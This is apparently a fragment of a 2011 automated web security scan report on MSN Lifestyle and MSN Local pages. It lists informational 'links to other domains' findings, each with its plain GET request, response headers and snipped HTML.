<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSzEYKoN82GNhjAupLCteWRSvjOmxINbd?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xme9vK4ys89_RoQ_9k-DhaETNhQBOhxwp?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xlvz-_HBW_C55uAhBjht0ikL5VWKNLQry?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XOSnicP0zi4RD7uBYNyTo0_JiWI0LrXS3?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xl77vevDxIoXHbt5xaIbmRHEA0OTz_Fyr?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XMAgRyWuH1mCfrY24d9Jxf7agLkLd9eJG?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div class="linkedimg"><a href="http://www.luckymag.com/?mbid=msn"><img src="http://blstb.msn.com/i/35/50ED7EDAB1DB2AA4E9FD373F6FFD.jpg" width="300" height="75" alt="Lucky Magazine" />
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS23"><span>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle" shape="rect" coords="245,1,277,25" /><area href="http://twitter.com/MSN_Style" alt="MSN Twitter" shape="rect" coords="279,3,300,25" /></map>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

17.131. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/well-groomed-male/staticslideshowgq.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx?cp-documentid=27188604&gt1=32001

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://www.bing.com/?FORM=MSNS23
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.gq.com/?mbid=synd_msnlife?mbid=msn
http://www.gq.com/entertainment/humor/201003/mens-worst-style-mistakes-undateable-ellen-rakieten-anne-coyle?mbid=synd_msnlife
http://www.gq.com/how-to/fashion/200709/cary-grant-paul-newman-andre-3000-george-clooney-slideshow?mbid=synd_msnlife
http://www.gq.com/style/wear-it-now/201012/style-gifts-25-under-25?mbid=synd_msnlife
http://www.gq.com/women/women-of-gq?mbid=synd_msnlife
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660809&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Fwell-groomed-male%2Fstaticslideshowgq.aspx%3Fcp-documentid%3D27188604%26gt1%3D32001&lc=1033&id=74314
https://magazine.gq.com/ecom/subscribe.jsp?oppId=4200046
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://w1.buysub.com/pubs/N3/GQM/self_lowprice808.jsp?cds_page_id=52367&cds_mag_code=GQM&id=1220375883278&lsid=82461218032063606&vid=1&cds_response_key=I8HNAFPJ&cds_mag_code=GQM
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-look/well-groomed-male/staticslideshowgq.aspx?cp-documentid=27188604&gt1=32001 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3fe428d2ec5a4eacb2566cf4cc6ac331; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7D6C8FEFA05844168529F087849CC663; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 55218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660809&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Fwell-groomed-male%2Fstaticslideshowgq.aspx%3Fcp-documentid%3D27188604%26gt1%3D32001&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.gq.com?mbid=synd_msnlife?mbid=msn"><img src="http://blstb.msn.com/i/87/9BA696C16E37EF13C14D12BCB31E6.jpg" width="90" height="30" alt="GQ" />
...[SNIP]...
<li class="first"><a href="http://www.gq.com/women/women-of-gq?mbid=synd_msnlife">The Sexiest Women in GQ</a>
...[SNIP]...
<li class=""><a href="http://www.gq.com/entertainment/humor/201003/mens-worst-style-mistakes-undateable-ellen-rakieten-anne-coyle?mbid=synd_msnlife">The Worst Fashion Mistakes Men Make</a>
...[SNIP]...
<li class=""><a href="http://www.gq.com/style/wear-it-now/201012/style-gifts-25-under-25?mbid=synd_msnlife">Budget Style: GQ's 25 Under $25</a>
...[SNIP]...
<li class=""><a href="http://www.gq.com/how-to/fashion/200709/cary-grant-paul-newman-andre-3000-george-clooney-slideshow?mbid=synd_msnlife">The 50 Most Stylish Men of the Past 50 Years</a>
...[SNIP]...
<li class="last"><a href="https://magazine.gq.com/ecom/subscribe.jsp?oppId=4200046">Subscribe to GQ for only $1 an issue</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx?cp-documentid=27188604&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
="http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx?cp-documentid=27188604&gt1=32001&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx?cp-documentid=27188604&gt1=32001&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="linkedimg"><a href="https://w1.buysub.com/pubs/N3/GQM/self_lowprice808.jsp?cds_page_id=52367&cds_mag_code=GQM&id=1220375883278&lsid=82461218032063606&vid=1&cds_response_key=I8HNAFPJ&cds_mag_code=GQM"><img src="http://blstb.msn.com/i/C5/D63E1ACD674321907F78224A9EEDF3.JPG" width="300" height="75" alt="GQ" />
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS23"><span>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

17.132. http://local.msn.com/hourly.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/hourly.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.msn.com/hourly.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660838&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /hourly.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fa5f616e96fb4c49b16708abc138146e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D65AF08EAC1B4826B90963F93D92117A; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660838&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC">Wednesday, Feb. 02, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomemsn.com/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
